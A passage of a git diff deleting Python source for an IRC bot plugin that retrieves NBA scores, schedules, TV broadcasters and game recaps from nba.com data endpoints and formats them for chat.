-        Given a team, if there is a game scheduled for today,
-        return where it is being broadcasted.
-        """
-        try:
-            team = self._parseTeamInput(team)
-        except ValueError as error:
-            irc.error(str(error))
-            return
-
-        games = self._filterGamesWithTeam(team, self._getTodayGames())
-
-        if not games:
-            irc.reply('{} is not playing today.'.format(team))
-            return
-
-        game = games[0]
-        game_string = self._gameToString(game)
-        broadcasters_string = self._broadcastersToString(game['tv_broadcasters'])
-        irc.reply('{} on: {}'.format(game_string, broadcasters_string))
-
-    nbatv = wrap(nbatv, ['somethingWithoutSpaces'])
-
-    def nbanext(self, irc, msg, args, n, team, team2):
-        """[<n>] <team> [<team2>]
-
-        Get the next <n> games (1 by default; max. 10) for a given team
-        or, if two teams are provided, matchups between them.
-
-        """
-        MAX_GAMES_IN_RESULT = 10
-
-        try:
-            if team == team2:
-                irc.error('Both teams should be different.')
-                return
-
-            team = self._parseTeamInput(team)
-            if team2 is not None:
-                team2 = self._parseTeamInput(team2)
-
-            team_schedule = self._getTeamSchedule(team)
-        except ValueError as error:
-            irc.error(str(error))
-            return
-
-        last_played = team_schedule['lastStandardGamePlayedIndex']
-
-        # Keeping only the games that haven't been played:
-        future_games = team_schedule['standard'][last_played+1:]
-
-        if n is None:
-            n = 1
-        end = min(MAX_GAMES_IN_RESULT, n, len(future_games)-1)
-
-        if team2 is None:
-            games = future_games
-        else:
-            # Filtering matchups between team and team2:
-            team2_id = self._tricodeToTeamId(team2)
-            games = [g for g in future_games \
-                     if team2_id in [g['vTeam']['teamId'],
-                                     g['hTeam']['teamId']]]
-
-        if not games:
-            irc.error('I could not find future games.')
-            return
-
-        for game in games[:end]:
-            irc.reply(self._upcomingGameToString(game))
-
-
-    nbanext = wrap(nbanext, [optional('positiveInt'),
-                             'somethingWithoutSpaces',
-                             optional('somethingWithoutSpaces')])
-
-    def nbalast(self, irc, msg, args, n, team, team2):
-        """[<n>] <team> [<team2>]
-
-        Get the last <n> games (1 by default; max. 10) for a given team
-        or, if two teams are provided, matchups between them.
- - """ - MAX_GAMES_IN_RESULT = 10 - - try: - if team == team2: - irc.error('Both teams should be different.') - return - - team = self._parseTeamInput(team) - if team2 is not None: - team2 = self._parseTeamInput(team2) - - team_schedule = self._getTeamSchedule(team) - except ValueError as error: - irc.error(str(error)) - return - - last_played = team_schedule['lastStandardGamePlayedIndex'] - - # Keeping only the games that have been played: - team_past_games = team_schedule['standard'][:last_played+1] - - # Making sure the number of games we will show is a valid one: - if n is None: - n = 1 - n = min(MAX_GAMES_IN_RESULT, n) - - if team2 is None: - games = team_past_games - else: - # Filtering matchups between team and team2: - team2_id = self._tricodeToTeamId(team2) - games = [g for g in team_past_games \ - if team2_id in [g['vTeam']['teamId'], - g['hTeam']['teamId']]] - - if not games: - irc.error('I could not find past games.') - return - - for game in reversed(games[-n:]): # Most-recent game first. - irc.reply(self._pastGameToString(game)) - - - nbalast = wrap(nbalast, [optional('positiveInt'), - 'somethingWithoutSpaces', - optional('somethingWithoutSpaces')]) - - @classmethod - def _parseOptionalArguments(cls, optional_team, optional_date): - """Parse the optional arguments, which could be None, and return - a (team, date) tuple. In case of finding an invalid argument, it - throws a ValueError exception. - """ - # No arguments: - if optional_team is None: - return (None, None) - - # Both arguments: - if (optional_date is not None) and (optional_team is not None): - team = cls._parseTeamInput(optional_team) - date = cls._parseDateInput(optional_date) - return (team, date) - - # Only one argument: - if cls._isPotentialDate(optional_team): - # Should be a date. - team = None - date = cls._parseDateInput(optional_team) - else: - # Should be a team. - team = cls._parseTeamInput(optional_team) - date = None - - return (team, date) - - def _getTodayGames(self): - return self._getGames(self._getTodayDate()) - - def _getGamesForDate(self, date): - return self._getGames(date) - - @staticmethod - def _filterGamesWithTeam(team, games): - """Given a list of games, return those that involve a given - team. If team is None, return the list with no modifications. - """ - if team is None: - return games - - return [g for g in games if team == g['home_team'] - or team == g['away_team']] - -############################ -# Content-getting helpers -############################ - def _getTodayJSON(self): - today_url = self._ENDPOINT_BASE_URL + '/10s/prod/v3/today.json' - return self._getJSON(today_url) - - def _getGames(self, date): - """Given a date, populate the url with it and try to download - its content. If successful, parse the JSON data and extract the - relevant fields for each game. Returns a list of games. - """ - url = self._getEndpointURL(date) - - # If asking for today's results, revalidate the cached data. - # ('If-Mod.-Since' flag.). This allows to get real-time scores. 
-        revalidate_cache = (date == self._getTodayDate())
-        response = self._getURL(url, revalidate_cache)
-
-        json_data = self._extractJSON(response)
-
-        return self._parseGames(json_data)
-
-    @classmethod
-    def _getEndpointURL(cls, date):
-        return cls._SCOREBOARD_ENDPOINT.format(date)
-
-    def _getTeamSchedule(self, tricode):
-        """Fetch the json with the given team's schedule"""
-
-        # First we fetch `today.json` to extract the path to teams'
-        # schedules and `seasonScheduleYear`:
-        today_json = self._getTodayJSON()
-        schedule_path = today_json['links']['teamScheduleYear2']
-        season_year = today_json['seasonScheduleYear']
-
-        # We also need to convert the `tricode` to a `team_id`:
-        team_id = self._tricodeToTeamId(tricode)
-
-        # (The path looks like this:
-        # '/prod/v1/{{seasonScheduleYear}}/teams/{{teamId}}/schedule.json')
-
-        # Now we can fill-in the url:
-        schedule_path = schedule_path.replace('{{teamId}}', team_id)
-        schedule_path = schedule_path.replace('{{seasonScheduleYear}}',
-                                              str(season_year))
-
-        return self._getJSON(self._ENDPOINT_BASE_URL + schedule_path)['league']
-
-    def _tricodeToTeamId(self, tricode):
-        """Given a valid team tricode, get the `teamId` used in NBA.com"""
-
-        teams_path = self._getJSON(self._TODAY_ENDPOINT)['links']['teams']
-        teams_json = self._getJSON(self._ENDPOINT_BASE_URL + teams_path)
-
-        for team in teams_json['league']['standard']:
-            if team['tricode'] == tricode:
-                return team['teamId']
-
-        raise ValueError('{} is not a valid tricode'.format(tricode))
-
-    def _teamIdToTricode(self, team_id):
-        """Given a valid teamId, get the team's tricode"""
-
-        teams_path = self._getJSON(self._TODAY_ENDPOINT)['links']['teams']
-        teams_json = self._getJSON(self._ENDPOINT_BASE_URL + teams_path)
-
-        for team in teams_json['league']['standard']:
-            if team['teamId'] == team_id:
-                return team['tricode']
-
-        raise ValueError('{} is not a valid teamId'.format(team_id))
-
-    def _getURL(self, url, force_revalidation=False):
-        """Use httplib2 to download the URL's content.
-
-        The `force_revalidation` parameter forces the data to be
-        validated before being returned from the cache.
-        In the worst case the data has not changed in the server,
-        and we get a '304 - Not Modified' response.
-        """
-        user_agent = 'Mozilla/5.0 \
-                      (X11; Ubuntu; Linux x86_64; rv:45.0) \
-                      Gecko/20100101 Firefox/45.0'
-        header = {'User-Agent': user_agent}
-
-        if force_revalidation:
-            header['Cache-Control'] = 'max-age=0'
-
-        response, content = self._http.request(url, 'GET', headers=header)
-
-        if response.fromcache:
-            self.log.debug('%s - 304/Cache Hit', url)
-
-        if response.status == 200:
-            return content
-
-        self.log.error('HTTP Error (%s): %s', url, error.code)
-        raise ConnectionError('Could not access URL')
-
-    @staticmethod
-    def _extractJSON(body):
-        return json.loads(body)
-
-    def _getJSON(self, url):
-        """Fetch `url` and return its contents decoded as json."""
-        return self._extractJSON(self._getURL(url))
-
-    @classmethod
-    def _parseGames(cls, json_data):
-        """Extract all relevant fields from NBA.com's scoreboard.json
-        and return a list of games.
-        """
-        games = []
-        for g in json_data['games']:
-            # Starting times are in UTC. By default, we will show
-            # Eastern times.
-            # (In the future we could add a user option to select
-            # timezones.)
-            try:
-                starting_time = cls._ISODateToEasternTime(g['startTimeUTC'])
-            except:
-                starting_time = 'TBD' if g['isStartTimeTBD'] else ''
-
-            game_info = {'game_id': g['gameId'],
-                         'home_team': g['hTeam']['triCode'],
-                         'away_team': g['vTeam']['triCode'],
-                         'home_score': g['hTeam']['score'],
-                         'away_score': g['vTeam']['score'],
-                         'starting_year': g['startDateEastern'][0:4],
-                         'starting_month': g['startDateEastern'][4:6],
-                         'starting_day': g['startDateEastern'][6:8],
-                         'starting_time': starting_time,
-                         'starting_time_TBD': g['isStartTimeTBD'],
-                         'clock': g['clock'],
-                         'period': g['period'],
-                         'buzzer_beater': g['isBuzzerBeater'],
-                         'ended': (g['statusNum'] == 3),
-                         'text_nugget': g['nugget']['text'].strip(),
-                         'tv_broadcasters': cls._extractGameBroadcasters(g)
-                        }
-
-            games.append(game_info)
-
-        return games
-
-    @staticmethod
-    def _extractGameBroadcasters(game_json):
-        """Extract the list of broadcasters from the API.
-        Return a dictionary of broadcasts:
-        (['vTeam', 'hTeam', 'national', 'canadian']) to
-        the short name of the broadcaster.
-        """
-        json_data = game_json['watch']['broadcast']['broadcasters']
-        game_broadcasters = dict()
-
-        for category in json_data:
-            broadcasters_list = json_data[category]
-            if broadcasters_list and 'shortName' in broadcasters_list[0]:
-                game_broadcasters[category] = broadcasters_list[0]['shortName']
-        return game_broadcasters
-
-############################
-# Formatting helpers
-############################
-    @classmethod
-    def _resultAsString(cls, games):
-        if not games:
-            return "No games found"
-
-        # sort games list and put F(inal) games at end
-        sorted_games = sorted(games, key=lambda k: k['ended'])
-        return ' | '.join([cls._gameToString(g) for g in sorted_games])
-
-    @classmethod
-    def _gameToString(cls, game):
-        """ Given a game, format the information into a string
-        according to the context.
-
-        For example:
-        * "MEM @ CLE 07:00 PM ET" (a game that has not started yet),
-        * "HOU 132 GSW 127 F OT2" (a game that ended and went to 2
-        overtimes),
-        * "POR 36 LAC 42 8:01 Q2" (a game in progress).
-        """
-        away_team = game['away_team']
-        home_team = game['home_team']
-
-        if game['period']['current'] == 0: # The game hasn't started yet
-            starting_time = game['starting_time'] \
-                            if not game['starting_time_TBD'] \
-                            else "TBD"
-            return "{} @ {} {}".format(away_team, home_team, starting_time)
-
-        # The game started => It has points:
-        away_score = game['away_score']
-        home_score = game['home_score']
-
-        away_string = "{} {}".format(away_team, away_score)
-        home_string = "{} {}".format(home_team, home_score)
-
-        # Bold for the winning team:
-        if int(away_score) > int(home_score):
-            away_string = ircutils.bold(away_string)
-        elif int(home_score) > int(away_score):
-            home_string = ircutils.bold(home_string)
-
-        game_string = "{} {} {}".format(away_string, home_string,
-                                        cls._clockBoardToString(game['clock'],
-                                                                game['period'],
-                                                                game['ended']))
-        # Highlighting 'buzzer-beaters':
-        if game['buzzer_beater'] and not game['ended']:
-            game_string = ircutils.mircColor(game_string, fg='yellow',
-                                             bg='black')
-
-        return game_string
-
-    @classmethod
-    def _clockBoardToString(cls, clock, period, game_ended):
-        """Get a string with current period and, if the game is still
-        in progress, the remaining time in it.
-        """
-        period_number = period['current']
-        # Game hasn't started => There is no clock yet.
-        if period_number == 0:
-            return ''
-
-        # Halftime
-        if period['isHalftime']:
-            return ircutils.mircColor('Halftime', 'orange')
-
-        period_string = cls._periodToString(period_number)
-
-        # Game finished:
-        if game_ended:
-            if period_number == 4:
-                return ircutils.mircColor('F', 'red')
-
-            return ircutils.mircColor("F {}".format(period_string), 'red')
-
-        # Game in progress:
-        if period['isEndOfPeriod']:
-            return ircutils.mircColor("E{}".format(period_string), 'blue')
-
-        # Period in progress, show clock:
-        return "{} {}".format(clock, ircutils.mircColor(period_string,
-                                                        'green'))
-
-    @staticmethod
-    def _periodToString(period):
-        """Get a string describing the current period in the game.
-
-        Period is an integer counting periods from 1 (so 5 would be
-        OT1).
-        The output format is as follows: {Q1...Q4} (regulation);
-        {OT, OT2, OT3...} (overtimes).
-        """
-        if period <= 4:
-            return "Q{}".format(period)
-
-        ot_number = period - 4
-        if ot_number == 1:
-            return "OT"
-        return "OT{}".format(ot_number)
-
-    @staticmethod
-    def _broadcastersToString(broadcasters):
-        """Given a broadcasters dictionary (category->name), where
-        category is in ['vTeam', 'hTeam', 'national', 'canadian'],
-        return a printable string representation of that list.
-        """
-        items = []
-        for category in ['vTeam', 'hTeam', 'national', 'canadian']:
-            if category in broadcasters:
-                items.append(broadcasters[category])
-        return ', '.join(items)
-
-    def _upcomingGameToString(self, game):
-        """Given a team's upcoming game, return a string with
-        the opponent's tricode and the date of the game.
-        """
-
-        date = self._ISODateToEasternDatetime(game['startTimeUTC'])
-
-        home_tricode = self._teamIdToTricode(game['hTeam']['teamId'])
-        away_tricode = self._teamIdToTricode(game['vTeam']['teamId'])
-
-        if game['isHomeTeam']:
-            home_tricode = ircutils.bold(home_tricode)
-        else:
-            away_tricode = ircutils.bold(away_tricode)
-
-        return '{} | {} @ {}'.format(date, away_tricode, home_tricode)
-
-    def _pastGameToString(self, game):
-        """Given a team's upcoming game, return a string with
-        the opponent's tricode and the result.
-        """
-        date = self._ISODateToEasternDate(game['startTimeUTC'])
-
-        home_tricode = self._teamIdToTricode(game['hTeam']['teamId'])
-        away_tricode = self._teamIdToTricode(game['vTeam']['teamId'])
-
-        home_score = int(game['hTeam']['score'])
-        away_score = int(game['vTeam']['score'])
-
-        if game['isHomeTeam']:
-            was_victory = (home_score > away_score)
-        else:
-            was_victory = (away_score > home_score)
-
-        if home_score > away_score:
-            home_tricode = ircutils.bold(home_tricode)
-            home_score = ircutils.bold(home_score)
-        else:
-            away_tricode = ircutils.bold(away_tricode)
-            away_score = ircutils.bold(away_score)
-
-        result = ircutils.mircColor('W', 'green') if was_victory \
-                 else ircutils.mircColor('L', 'red')
-
-        points = '{} {} {} {}'.format(away_tricode, away_score,
-                                      home_tricode, home_score)
-
-        if game['seasonStageId'] == 1:
-            points += ' (Preseason)'
-
-        return '{} {} | {}'.format(date, result, points)
-
-############################
-# Date-manipulation helpers
-############################
-    @classmethod
-    def _getTodayDate(cls):
-        """Get the current date formatted as "YYYYMMDD".
-        Because the API separates games by day of start, we will
-        consider and return the date in the Pacific timezone.
-        The objective is to avoid reading future games anticipatedly
-        when the day rolls over at midnight, which would cause us to
-        ignore games in progress that may have started on the previous
-        day.
-        Taking the west coast time guarantees that the day will advance
-        only when the whole continental US is already on that day.
-        """
-        today = cls._pacificTimeNow().date()
-        today_iso = today.isoformat()
-        return today_iso.replace('-', '')
-
-    @staticmethod
-    def _easternTimeNow():
-        return datetime.datetime.now(pytz.timezone('US/Eastern'))
-
-    @staticmethod
-    def _pacificTimeNow():
-        return datetime.datetime.now(pytz.timezone('US/Pacific'))
-
-    @staticmethod
-    def _ISODateToEasternDate(iso):
-        """Convert the ISO date in UTC time that the API outputs into an
-        Eastern-time date.
-        (The default human-readable format for the listing of games).
-        """
-        date = dateutil.parser.parse(iso)
-        date_eastern = date.astimezone(pytz.timezone('US/Eastern'))
-        eastern_date = date_eastern.strftime('%a %m/%d')
-        return "{}".format(eastern_date)
-
-    @staticmethod
-    def _ISODateToEasternTime(iso):
-        """Convert the ISO date in UTC time that the API outputs into an
-        Eastern time formatted with am/pm.
-        (The default human-readable format for the listing of games).
-        """
-        date = dateutil.parser.parse(iso)
-        date_eastern = date.astimezone(pytz.timezone('US/Eastern'))
-        eastern_time = date_eastern.strftime('%-I:%M %p')
-        return "{} ET".format(eastern_time)
-
-    @staticmethod
-    def _ISODateToEasternDatetime(iso):
-        """Convert the ISO date in UTC time that the API outputs into a
-        string with a date and Eastern time formatted with am/pm.
-        """
-        date = dateutil.parser.parse(iso)
-        date_eastern = date.astimezone(pytz.timezone('US/Eastern'))
-        eastern_datetime = date_eastern.strftime('%a %m/%d, %I:%M %p')
-        return "{} ET".format(eastern_datetime)
-
-    @staticmethod
-    def _stripDateSeparators(date_string):
-        return date_string.replace('-', '')
-
-    @classmethod
-    def _EnglishDateToDate(cls, date):
-        """Convert a human-readable like 'yesterday' to a datetime
-        object and return a 'YYYYMMDD' string.
-        """
-        if date == 'yesterday':
-            day_delta = -1
-        elif date == 'today' or date == 'tonight':
-            day_delta = 0
-        elif date == 'tomorrow':
-            day_delta = 1
-        # Calculate the day difference and return a string
-        date_string = (cls._pacificTimeNow() +
-                       datetime.timedelta(days=day_delta)).strftime('%Y%m%d')
-        return date_string
-
-    @classmethod
-    def _isValidTricode(cls, team):
-        return team in cls._TEAM_TRICODES
-
-############################
-# Input-parsing helpers
-############################
-    @classmethod
-    def _isPotentialDate(cls, string):
-        """Given a user-provided string, check whether it could be a
-        date.
-        """
-        return (string.lower() in cls._FUZZY_DAYS or
-                string.replace('-', '').isdigit())
-
-    @classmethod
-    def _parseTeamInput(cls, team):
-        """Given a user-provided string, try to extract an upper-case
-        team tricode from it. If not valid, throws a ValueError
-        exception.
-        """
-        t = team.upper()
-        if not cls._isValidTricode(t):
-            raise ValueError('{} is not a valid team'.format(team))
-        return t
-
-    @classmethod
-    def _parseDateInput(cls, date):
-        """Verify that the given string is a valid date formatted as
-        YYYY-MM-DD. Also, the API seems to go back until 2014-10-04,
-        so we will check that the input is not a date earlier than that.
-        In case of failure, throws a ValueError exception.
- """ - date = date.lower() - - if date in cls._FUZZY_DAYS: - date = cls._EnglishDateToDate(date) - - elif date.replace('-', '').isdigit(): - try: - parsed_date = datetime.datetime.strptime(date, '%Y-%m-%d') - except: - raise ValueError('Incorrect date format, should be YYYY-MM-DD') - - # The current API goes back until 2014-10-04. Is it in range? - if parsed_date.date() < datetime.date(2014, 10, 4): - raise ValueError('I can only go back until 2014-10-04') - else: - raise ValueError('Date is not valid') - - return cls._stripDateSeparators(date) - - - def _getRecapInfo(self, game): - """Given a finished game, fetch its recap summary and a link - to its video recap. It returns a string with the format - '{summary} (link to video)'. - - The link is shortened by calling _shortenURL(str) -> str. - """ - - recap_base_url = 'https://www.nba.com/video/'\ - '{year}/{month}/{day}/'\ - '{game_id}-{away_team}-{home_team}-recap.xml' - - url = recap_base_url.format(year=game['starting_year'], - month=game['starting_month'], - day=game['starting_day'], - game_id=game['game_id'], - away_team=game['away_team'].lower(), - home_team=game['home_team'].lower()) - - xml = self._getURL(url) - tree = ElementTree.fromstring(xml) - - res = [] - - summary = tree.find('description') - if summary is not None: - res.append(summary.text) - - video_recap = tree.find("*file[@bitrate='1920x1080_5904']") - if video_recap is not None: - url = self._shortenURL(video_recap.text) - res.append('({})'.format(url)) - - return ' '.join(res) - - @staticmethod - def _shortenURL(url): - """ Run a link through an URL shortener and return the new url.""" - - # Complete with the code that uses your desired - # shortener service. - return url - - -Class = NBA - -# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py deleted file mode 100644 index c0d28e8..0000000 --- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py +++ /dev/null @@ -1,831 +0,0 @@ -### -# Copyright (c) 2018, Santiago Gil -# Copyright (c) 2020, oddluck -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# -# * Redistributions of source code must retain the above copyright notice, -# this list of conditions, and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions, and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * Neither the name of the author of this software nor the name of -# contributors to this software may be used to endorse or promote products -# derived from this software without specific prior written consent. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. 
diff --git a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py b/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py
deleted file mode 100644
index c0d28e8..0000000
--- a/v1/data/codefile/oddluck@limnoria-plugins__33c7a3f__NBA$plugin.py.target.py
+++ /dev/null
@@ -1,831 +0,0 @@
-###
-# Copyright (c) 2018, Santiago Gil
-# Copyright (c) 2020, oddluck
-# All rights reserved.
-#
-# Redistribution and use in source and binary forms, with or without
-# modification, are permitted provided that the following conditions are met:
-#
-#   * Redistributions of source code must retain the above copyright notice,
-#     this list of conditions, and the following disclaimer.
-#   * Redistributions in binary form must reproduce the above copyright notice,
-#     this list of conditions, and the following disclaimer in the
-#     documentation and/or other materials provided with the distribution.
-#   * Neither the name of the author of this software nor the name of
-#     contributors to this software may be used to endorse or promote products
-#     derived from this software without specific prior written consent.
-#
-# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
-# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
-# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
-# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
-# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
-# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
-# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-# POSSIBILITY OF SUCH DAMAGE.
-###
-
-#import supybot.utils as utils
-#from supybot.commands import *
-from supybot.commands import optional, wrap
-
-#import supybot.plugins as plugins
-import supybot.ircutils as ircutils
-import supybot.callbacks as callbacks
-import httplib2
-import json
-import pendulum
-from xml.etree import ElementTree
-
-try:
-    from supybot.i18n import PluginInternationalization
-    _ = PluginInternationalization('NBA')
-except ImportError:
-    # Placeholder that allows to run the plugin on a bot
-    # without the i18n module
-    _ = lambda x: x
-
-class NBA(callbacks.Plugin):
-    """Get scores from NBA.com."""
-
-    _ENDPOINT_BASE_URL = 'https://data.nba.net'
-
-    _SCOREBOARD_ENDPOINT = (_ENDPOINT_BASE_URL
-                            + '/10s/prod/v2/{}/'
-                            + 'scoreboard.json')
-
-    _TODAY_ENDPOINT = (_ENDPOINT_BASE_URL
-                       + '/prod/v3/today.json')
-
-    _FUZZY_DAYS = frozenset(('yesterday', 'tonight',
-                             'today', 'tomorrow'))
-
-    _TEAM_TRICODES = frozenset(('CHA', 'ATL', 'IND', 'MEM', 'DET',
-                                'UTA', 'CHI', 'TOR', 'CLE', 'OKC',
-                                'DAL', 'MIN', 'BOS', 'SAS', 'MIA',
-                                'DEN', 'LAL', 'PHX', 'NOP', 'MIL',
-                                'HOU', 'NYK', 'ORL', 'SAC', 'PHI',
-                                'BKN', 'POR', 'GSW', 'LAC', 'WAS'))
-
-    def __init__(self, irc):
-        self.__parent = super(NBA, self)
-        self.__parent.__init__(irc)
-
-        self._http = httplib2.Http('.cache')
-
-    def nba(self, irc, msg, args, optional_team, optional_date):
-        """[<team>] [<date>]
-
-        Get games for a given date. If none is specified, return
-        games scheduled for today. Optionally add team abbreviation
-        to filter for a specific team.
-        """
-
-        # Check to see if there's optional input and if there is check
-        # if it's a date or a team, or both.
-        try:
-            team, date = self._parseOptionalArguments(optional_team,
-                                                      optional_date)
-        except ValueError as error:
-            irc.error(str(error))
-            return
-
-        try:
-            games = self._getTodayGames() if date is None \
-                    else self._getGamesForDate(date)
-        except ConnectionError as error:
-            irc.error('Could not connect to nba.com')
-            return
-        except:
-            irc.error('Something went wrong')
-            return
-
-        games = self._filterGamesWithTeam(team, games)
-
-        games_string = self._resultAsString(games)
-
-        # Single game query? We can show some extra info.
-        if len(games) == 1:
-            game = games[0]
-
-            # If the game has ended, we fetch the recap info from NBA.com:
-            if game['ended']:
-                try:
-                    recap = self._getRecapInfo(game)
-                    games_string += ' | {} {}'.format(ircutils.bold('Recap:'),
-                                                      recap)
-                except:
-                    pass
-
-            else:
-                # Otherwise, when querying a specific game in progress,
-                # we show the broadcaster list.
-                # Also, if it has a text nugget, and it's not
-                # 'Watch live', we show it:
-                broadcasters = game['tv_broadcasters']
-                broadcasters_string = self._broadcastersToString(broadcasters)
-                games_string += ' [{}]'.format(broadcasters_string)
-
-                nugget = game['text_nugget']
-                nugget_is_interesting = nugget and 'Watch live' not in nugget
-                if nugget_is_interesting:
-                    games_string += ' | {}'.format(nugget)
-
-        if date:
-            date = pendulum.from_format(date, 'YYYYMMDD').to_date_string()
-        else:
-            date = pendulum.now().to_date_string()
-
-        irc.reply("{0}: {1}".format(date, games_string))
-
-    nba = wrap(nba, [optional('somethingWithoutSpaces'),
-                     optional('somethingWithoutSpaces')])
-
-    def nbatv(self, irc, msg, args, team):
-        """[<team>]
-
-        Given a team, if there is a game scheduled for today,
-        return where it is being broadcasted.
-        """
-        try:
-            team = self._parseTeamInput(team)
-        except ValueError as error:
-            irc.error(str(error))
-            return
-
-        games = self._filterGamesWithTeam(team, self._getTodayGames())
-
-        if not games:
-            irc.reply('{} is not playing today.'.format(team))
-            return
-
-        game = games[0]
-        game_string = self._gameToString(game)
-        broadcasters_string = self._broadcastersToString(game['tv_broadcasters'])
-        irc.reply('{} on: {}'.format(game_string, broadcasters_string))
-
-    nbatv = wrap(nbatv, ['somethingWithoutSpaces'])
-
-    def nbanext(self, irc, msg, args, n, team, team2):
-        """[<n>] <team> [<team2>]
-
-        Get the next <n> games (1 by default; max. 10) for a given team
-        or, if two teams are provided, matchups between them.
-
-        """
-        MAX_GAMES_IN_RESULT = 10
-
-        try:
-            if team == team2:
-                irc.error('Both teams should be different.')
-                return
-
-            team = self._parseTeamInput(team)
-            if team2 is not None:
-                team2 = self._parseTeamInput(team2)
-
-            team_schedule = self._getTeamSchedule(team)
-        except ValueError as error:
-            irc.error(str(error))
-            return
-
-        last_played = team_schedule['lastStandardGamePlayedIndex']
-
-        # Keeping only the games that haven't been played:
-        future_games = team_schedule['standard'][last_played+1:]
-
-        if n is None:
-            n = 1
-        end = min(MAX_GAMES_IN_RESULT, n, len(future_games)-1)
-
-        if team2 is None:
-            games = future_games
-        else:
-            # Filtering matchups between team and team2:
-            team2_id = self._tricodeToTeamId(team2)
-            games = [g for g in future_games \
-                     if team2_id in [g['vTeam']['teamId'],
-                                     g['hTeam']['teamId']]]
-
-        if not games:
-            irc.error('I could not find future games.')
-            return
-
-        for game in games[:end]:
-            irc.reply(self._upcomingGameToString(game))
-
-
-    nbanext = wrap(nbanext, [optional('positiveInt'),
-                             'somethingWithoutSpaces',
-                             optional('somethingWithoutSpaces')])
-
-    def nbalast(self, irc, msg, args, n, team, team2):
-        """[<n>] <team> [<team2>]
-
-        Get the last <n> games (1 by default; max. 10) for a given team
-        or, if two teams are provided, matchups between them.
- - """ - MAX_GAMES_IN_RESULT = 10 - - try: - if team == team2: - irc.error('Both teams should be different.') - return - - team = self._parseTeamInput(team) - if team2 is not None: - team2 = self._parseTeamInput(team2) - - team_schedule = self._getTeamSchedule(team) - except ValueError as error: - irc.error(str(error)) - return - - last_played = team_schedule['lastStandardGamePlayedIndex'] - - # Keeping only the games that have been played: - team_past_games = team_schedule['standard'][:last_played+1] - - # Making sure the number of games we will show is a valid one: - if n is None: - n = 1 - n = min(MAX_GAMES_IN_RESULT, n) - - if team2 is None: - games = team_past_games - else: - # Filtering matchups between team and team2: - team2_id = self._tricodeToTeamId(team2) - games = [g for g in team_past_games \ - if team2_id in [g['vTeam']['teamId'], - g['hTeam']['teamId']]] - - if not games: - irc.error('I could not find past games.') - return - - for game in reversed(games[-n:]): # Most-recent game first. - irc.reply(self._pastGameToString(game)) - - - nbalast = wrap(nbalast, [optional('positiveInt'), - 'somethingWithoutSpaces', - optional('somethingWithoutSpaces')]) - - @classmethod - def _parseOptionalArguments(cls, optional_team, optional_date): - """Parse the optional arguments, which could be None, and return - a (team, date) tuple. In case of finding an invalid argument, it - throws a ValueError exception. - """ - # No arguments: - if optional_team is None: - return (None, None) - - # Both arguments: - if (optional_date is not None) and (optional_team is not None): - team = cls._parseTeamInput(optional_team) - date = cls._parseDateInput(optional_date) - return (team, date) - - # Only one argument: - if cls._isPotentialDate(optional_team): - # Should be a date. - team = None - date = cls._parseDateInput(optional_team) - else: - # Should be a team. - team = cls._parseTeamInput(optional_team) - date = None - - return (team, date) - - def _getTodayGames(self): - return self._getGames(self._getTodayDate()) - - def _getGamesForDate(self, date): - return self._getGames(date) - - @staticmethod - def _filterGamesWithTeam(team, games): - """Given a list of games, return those that involve a given - team. If team is None, return the list with no modifications. - """ - if team is None: - return games - - return [g for g in games if team == g['home_team'] - or team == g['away_team']] - -############################ -# Content-getting helpers -############################ - def _getTodayJSON(self): - today_url = self._ENDPOINT_BASE_URL + '/10s/prod/v3/today.json' - return self._getJSON(today_url) - - def _getGames(self, date): - """Given a date, populate the url with it and try to download - its content. If successful, parse the JSON data and extract the - relevant fields for each game. Returns a list of games. - """ - url = self._getEndpointURL(date) - - # If asking for today's results, revalidate the cached data. - # ('If-Mod.-Since' flag.). This allows to get real-time scores. 
-        revalidate_cache = (date == self._getTodayDate())
-        response = self._getURL(url, revalidate_cache)
-
-        json_data = self._extractJSON(response)
-
-        return self._parseGames(json_data)
-
-    @classmethod
-    def _getEndpointURL(cls, date):
-        return cls._SCOREBOARD_ENDPOINT.format(date)
-
-    def _getTeamSchedule(self, tricode):
-        """Fetch the json with the given team's schedule"""
-
-        # First we fetch `today.json` to extract the path to teams'
-        # schedules and `seasonScheduleYear`:
-        today_json = self._getTodayJSON()
-        schedule_path = today_json['links']['teamScheduleYear2']
-        season_year = today_json['seasonScheduleYear']
-
-        # We also need to convert the `tricode` to a `team_id`:
-        team_id = self._tricodeToTeamId(tricode)
-
-        # (The path looks like this:
-        # '/prod/v1/{{seasonScheduleYear}}/teams/{{teamId}}/schedule.json')
-
-        # Now we can fill-in the url:
